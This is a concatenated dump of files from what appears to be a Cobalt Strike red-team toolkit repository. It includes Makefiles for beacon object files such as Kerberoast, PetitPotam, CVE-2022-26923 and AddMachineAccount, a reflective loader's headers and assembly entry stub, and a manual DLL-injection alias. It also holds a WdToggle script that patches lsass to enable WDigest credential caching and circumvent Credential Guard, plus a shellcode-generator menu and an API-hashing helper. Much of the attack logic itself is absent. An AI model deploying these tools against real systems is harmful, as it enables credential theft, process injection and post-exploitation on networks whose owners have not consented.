all: $(OBJS) 10 | 11 | %.o: %.c 12 
| $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/SprayAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Winver/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Common.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * 
GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /* Include core defs */ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include "Native.h" 19 | #include "Macros.h" 20 | 21 | /* Include Library */ 22 | #include "Labels.h" 23 | #include "Hash.h" 24 | #include "Peb.h" 25 | #include "Ldr.h" 26 | #include "Pe.h" 27 | 28 | /* Include Hooks! */ 29 | #include "hooks/DnsQuery_A.h" 30 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/FindObjects/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | 
-------------------------------------------------------------------------------- /Cobatl Strike/Kerberoast/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/PetitPotam/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | 
$(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | # $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | # $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Loader/COFF Loader/Include/utils.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifdef _DEBUG 7 | #define DEBUG_PRINT(x, ...) printf(x, ##__VA_ARGS__) 8 | #else 9 | #define DEBUG_PRINT(x, ...) 10 | #endif 11 | 12 | typedef struct _Arg { 13 | char* value; 14 | size_t size; 15 | BOOL includeSize; 16 | } Arg; 17 | 18 | 19 | void PrintBanner(); 20 | void PrintUsage(char* ExecutableName); 21 | void PackData(Arg* args, size_t numberOfArgs, char** output, size_t* size); 22 | char* ReadFile(char* FilePath, DWORD* FileSize); -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x86/Start.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 32] 9 | 10 | ;; 11 | ;; Import 12 | ;; 13 | EXTERN _Titan 14 | 15 | ;; 16 | ;; Export 17 | ;; 18 | GLOBAL _Start 19 | 20 | [SECTION .text$A] 21 | 22 | _Start: 23 | ;; 24 | ;; Setup stack 25 | ;; 26 | push ebp 27 | mov ebp, esp 28 | 29 | ;; 30 | ;; Execute Ldr 31 | ;; 32 | call _Titan 33 | 34 | ;; 35 | ;; Cleanup stack 36 | ;; 37 | mov esp, ebp 38 | pop ebp 39 | 40 | ;; 41 | ;; Return 42 | ;; 43 | ret 44 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/sleepmask-vs/BOF-Template/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, 
function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 | #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/AddMachineAccount/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/CVE-2022-26923/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | 
-------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/shared/config.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define MAGIC "WKLWKL" 4 | #define WM_SET_QUALITY WM_USER + 1 5 | // NOTE(review): WM_SET_QUALITY expands to the unparenthesised expression WM_USER + 1, so using it inside a larger expression can change the result; (WM_USER + 1) is the safe form. MAGIC is a fixed string; if it is sent on the wire (not visible in this header) it is a stable indicator for detection - TODO confirm against the code that uses it. 6 | typedef unsigned int COMPATUINT; 7 | typedef struct __attribute__((packed)) 8 | { 9 | COMPATUINT msg; 10 | COMPATUINT wParam; 11 | COMPATUINT lParam; 12 | } MSGPACKET, *PMSGPACKET; 13 | 14 | enum Connection 15 | { 16 | desktop, 17 | input, 18 | end 19 | }; 20 | 21 | enum Quality 22 | { 23 | QUALITY_LOW = 10, 24 | QUALITY_MEDIUM = 40, 25 | QUALITY_HIGH = 100, 26 | }; 27 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-explicit/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 
| #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-spawn/base/helpers.h: -------------------------------------------------------------------------------- 1 | #ifdef __cplusplus 2 | #ifndef _DEBUG 3 | #define DFR(module, function) \ 4 | DECLSPEC_IMPORT decltype(function) module##$##function; 5 | 6 | #define DFR_LOCAL(module, function) \ 7 | DECLSPEC_IMPORT decltype(function) module##$##function; \ 8 | decltype(module##$##function) *##function = module##$##function; 9 | #else 10 | #define DFR_LOCAL(module, function) 11 | #define DFR(module, function) \ 12 | decltype(function) *module##$##function = function; 13 | #endif // end of _DEBUG 14 | #endif // end of __cplusplus -------------------------------------------------------------------------------- /Cobatl Strike/Winver/Winver.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("Winver", "Display the version of Windows that is running, the build number and patch release (Update Build Revision).", 5 | "Synopsis: Winver\n\n" . 6 | "Display Windows version info.\n\n"); 7 | 8 | alias Winver { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("Winver." . barch($bid) . 
".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bof/main.c: -------------------------------------------------------------------------------- 1 | #include "../common.h" 2 | 3 | VOID go( PVOID Argv, INT Argc ) 4 | { 5 | BAPI_TABLE Api; 6 | 7 | RtlSecureZeroMemory( &Api, sizeof( Api ) ); 8 | Api.BeaconInjectProcess = C_PTR( BeaconInjectProcess ); 9 | Api.BeaconDataExtract = C_PTR( BeaconDataExtract ); 10 | Api.BeaconDataParse = C_PTR( BeaconDataParse ); 11 | Api.BeaconDataShort = C_PTR( BeaconDataShort ); 12 | Api.BeaconIsAdmin = C_PTR( BeaconIsAdmin ); 13 | Api.BeaconPrintf = C_PTR( BeaconPrintf ); 14 | 15 | BofMain( &Api, Argv, Argc ); 16 | }; 17 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\bin\Debug\Encryptor.exe 2 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\bin\Debug\Encryptor.pdb 3 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.csproj.CoreCompileInputs.cache 4 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.exe 5 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.pdb 6 | C:\Tools\cobaltstrike\aggressors\CSSG\assets\Encryptor\obj\Debug\Encryptor.csproj.AssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/delfirewallrule.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //RemoveFirewallRule 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD 
dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 7 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 8 | WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR); 9 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/LocalNegotiator.h: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | 3 | #pragma once 4 | #include 5 | #include 6 | class LocalNegotiator 7 | { 8 | public: 9 | LocalNegotiator(); 10 | int handleType1(char* ntlmBytes, int len); 11 | int handleType2(char* ntlmBytes, int len); 12 | int handleType3(char* ntlmBytes, int len); 13 | PCtxtHandle phContext; 14 | int authResult; 15 | 16 | private: 17 | CredHandle hCred; 18 | SecBufferDesc secClientBufferDesc, secServerBufferDesc; 19 | SecBuffer secClientBuffer, secServerBuffer; 20 | }; 21 | 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Killer/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | 7 | namespace BeaconKiller 8 | { 9 | internal static class Program 10 | { 11 | /// 12 | /// The main entry point for the application: enables visual styles and runs MainForm on an STA thread. 13 | /// 14 | [STAThread] 15 | static void Main() 16 | { 17 | Application.EnableVisualStyles(); 18 | Application.SetCompatibleTextRenderingDefault(false); 19 | Application.Run(new MainForm()); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/Domaininfo.cna:
-------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("Domaininfo", "Using Active Directory Domain Services to enumerate domain information.", 5 | "Using Active Directory Domain Services to enumerate domain information.\n\n" . 6 | "Synopsis: Domaininfo\n\n"); 7 | 8 | alias Domaininfo { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("Domaininfo." . barch($bid) . ".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Mory/utils/data2blob.js: -------------------------------------------------------------------------------- 1 | /** 2 | * Convert a base64 data URL to binary (a Blob). Assumes data contains a comma; input without one is not handled here. 3 | * 4 | * @param {[String]} data dataURL of the form "data:image/png;base64,****"; everything before the comma is descriptive metadata, only the part after the comma is used 5 | * @param {[String]} mime MIME type set as the type of the returned Blob 6 | * @return {[blob]} Blob holding the decoded bytes 7 | */ 8 | export default function(data, mime) { 9 | data = data.split(',')[1]; 10 | data = window.atob(data); 11 | var ia = new Uint8Array(data.length); 12 | for (var i = 0; i < data.length; i++) { 13 | ia[i] = data.charCodeAt(i); 14 | }; 15 | // canvas.toDataURL returns image/png by default 16 | return new Blob([ia], { 17 | type: mime 18 | }); 19 | }; 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1");
9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . $value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1"); 9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . $value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/timestamped_activitylog_export.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | #load this script to output all event and activity logs with human-readable timestamp to activitylog.txt in your working directory 3 | 4 | #note: the file save prompt will pop up once for each server you are connected to 5 | 6 | prompt_file_save($null, { 7 | local('$handle'); 8 | $handle = openf(">> $+ $1"); 9 | foreach $key => $value (archives()) 10 | { 11 | println($handle, dstamp($value['when']) . " " . formatDate("z") . "\t" . $value['data'] . "\t" . $value['type']. "\t" . 
$value['bid']); 12 | } 13 | closef($handle); 14 | }); -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x64/Start.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 64] 9 | 10 | ;; 11 | ;; Import 12 | ;; 13 | EXTERN Titan 14 | 15 | ;; 16 | ;; Export 17 | ;; 18 | GLOBAL Start 19 | 20 | [SECTION .text$A] 21 | 22 | Start: 23 | ;; 24 | ;; Setup stack 25 | ;; 26 | push rsi 27 | mov rsi, rsp 28 | and rsp, 0FFFFFFFFFFFFFFF0h 29 | 30 | ;; 31 | ;; Execute Ldr 32 | ;; 33 | sub rsp, 020h 34 | call Titan 35 | 36 | ;; 37 | ;; Cleanup stack 38 | ;; 39 | mov rsp, rsi 40 | pop rsi 41 | 42 | ;; 43 | ;; Return 44 | ;; 45 | ret 46 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/scripts/hashstring.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | # https://github.com/realoriginal/titanldr-ng/blob/master/python3/hashstring.py 5 | # NOTE(review): hash_string is a djb2-style string hash (seed 5381, hash*33 + ord(c)) over the upper-cased input, masked to 32 bits. The bare except makes it return None on any error, and the caller's '0x%x' format then raises a TypeError that only the IndexError handler does not catch; __name__ in '__main__' is a substring test, where == is the usual comparison. Presumably the values are the precomputed name hashes the loader code compares against - TODO confirm; being deterministic, such constants are usable as static detection pivots. 6 | import sys 7 | 8 | def hash_string( string ): 9 | try: 10 | hash = 5381 11 | 12 | for x in string.upper(): 13 | hash = (( hash << 5 ) + hash ) + ord(x) 14 | 15 | return hash & 0xFFFFFFFF 16 | except: 17 | pass 18 | 19 | if __name__ in '__main__': 20 | try: 21 | print('0x%x' % hash_string(sys.argv[1])); 22 | except IndexError: 23 | print('usage: %s [string]' % sys.argv[0]); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/inject.cna: -------------------------------------------------------------------------------- 1 | alias mandllinject { 2 | local('$handle $data $args $fileData'); 3 | 4 | # figure out the arch of this session 5 | $barch = barch($1); 6 | 7 | # read in the right BOF file 8 | $handle =
openf(script_resource("inject.o")); 9 | $data = readb($handle, -1); 10 | closef($handle); 11 | 12 | $dll_handle = openf($2); 13 | $file_data = readb($dll_handle, -1); 14 | closef($dll_handle); 15 | 16 | # pack our arguments 17 | $args = bof_pack($1, "bi", $file_data, $3); 18 | 19 | btask($1, "Manual DLL Inject - @tomcarver_"); 20 | 21 | # execute it. 22 | beacon_inline_execute($1, $data, "go", $args); 23 | } -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/CSSG_load.cna: -------------------------------------------------------------------------------- 1 | # CSSG Cobalt Strike Shellcode Generator 2 | # Inspired by @offsec_ginger https://github.com/offsecginger/AggressorScripts 3 | # 4 | # Shellcode Generator 5 | # 6 | # Add "Shellcode" top menubar button, "Shellcode Generator" submenu item, and load shellcode_generator.cna on click 7 | 8 | # Location of shellcode generator cna 9 | $SCGEN = "/scripts/shellcode_generator.cna"; 10 | 11 | menubar("Shellcode", "shellcodegen", 2); 12 | popup shellcodegen { 13 | 14 | item "&Shellcode Generator" { 15 | @aggressor = script_resource(($SCGEN).""); 16 | println(@aggressor); 17 | include(@aggressor); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/WdToggle.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | beacon_command_register("WdToggle", "Patch lsass to enable WDigest credential caching and to circumvent Credential Guard (if enabled).", 5 | "Synopsis: WdToggle\n\n" . 6 | "Enable WDigest credential caching and circumvent Credential Guard (if enabled).\n\n"); 7 | 8 | alias WdToggle { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("WdToggle." . barch($bid) . 
".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "idletime", "Check current user activity based on the user's last input", 5 | "INFO:\nCheck current user activity based on the user's last input. Returns the time in format HH:MM:SS.\n\n" . 6 | "USAGE:\nidletime\n\n"); 7 | 8 | alias idletime { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("idletime.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | blog($bid, "Tasked to check user activity.."); 17 | beacon_inline_execute($bid, $data, "go", $null); 18 | } 19 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/tools/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | port=5912 4 | host="localhost" 5 | 6 | cnt=$1 7 | 8 | [ -n "$cnt" ] || cnt=100 9 | 10 | i=0 11 | 12 | gen_mac() { 13 | m1=$(date +%s%N | md5sum | head -c 2) 14 | m2=$(date +%s%N | md5sum | head -c 2) 15 | m3=$(date +%s%N | md5sum | head -c 2) 16 | m4=$(date +%s%N | md5sum | head -c 2) 17 | m5=$(date +%s%N | md5sum | head -c 2) 18 | m6=$(date +%s%N | md5sum | head -c 2) 19 | 20 | echo "$m1$m2$m3$m4$m5$m6" | tr '[:lower:]' '[:upper:]' 21 | } 22 | 23 | while [ $i -ne $cnt ] 24 | do 25 | rtty -I "$(gen_mac)" -d "$(date +%s%N | md5sum | head -c 20)" -h $host -p $port & 26 | i=$((i+1)) 27 | done 28 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/enumdrives.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | 
beacon_command_register( 4 | "enumdrives", "Enumerate drive letters and its type.", 5 | "INFO:\nEnumerate drive letters and its type.\n\n" . 6 | "USAGE:\nenumdrives\n\n"); 7 | 8 | alias enumdrives { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("enumdrives.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to enumerate drive letters and its type.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/src/trustedsec-bof-print.h: -------------------------------------------------------------------------------- 1 | WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size); 2 | WINBASEAPI int WINAPI MSVCRT$vsnprintf(char* buffer, size_t count, const char* format, va_list arg); 3 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 4 | WINBASEAPI void* WINAPI MSVCRT$memcpy(void* dest, const void* src, size_t count); 5 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 6 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 7 | WINBASEAPI void __cdecl MSVCRT$free(void *memblock); 8 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); 9 | 10 | 11 | -------------------------------------------------------------------------------- /Loader/AceLdr/scripts/hashstring.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | # 5 | # https://github.com/SecIdiot/TitanLdr/blob/master/python3/hashstring.py 6 | # 7 | 8 | import sys 9 | 10 | def hash_string( string ): 11 | try: 12 | hash = 5381 13 | 14 | for x in string.upper(): 15 | hash = (( hash << 5 ) + hash ) + ord(x) 16 | 17 | return hash & 0xFFFFFFFF 18 | 